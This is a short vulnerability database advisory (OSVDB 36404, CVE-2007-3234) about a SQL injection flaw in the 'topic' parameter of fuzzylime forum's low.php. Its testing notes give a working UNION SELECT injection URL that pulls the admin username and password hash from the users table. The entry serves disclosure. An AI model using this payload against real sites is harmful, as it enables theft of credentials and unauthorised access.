fuzzylime (forum) low.php topic Variable SQL Injection

2007-06-12T00:00:00
ID OSVDB:36404
Type osvdb
Reporter Silentz()
Modified 2007-06-12T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://victim.com/low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE userid=1/*

References:

Secunia Advisory ID:25653 Related OSVDB ID: 36405 Related OSVDB ID: 36406 Other Advisory URL: http://milw0rm.com/exploits/4062 ISS X-Force ID: 34838 CVE-2007-3234 Bugtraq ID: 24451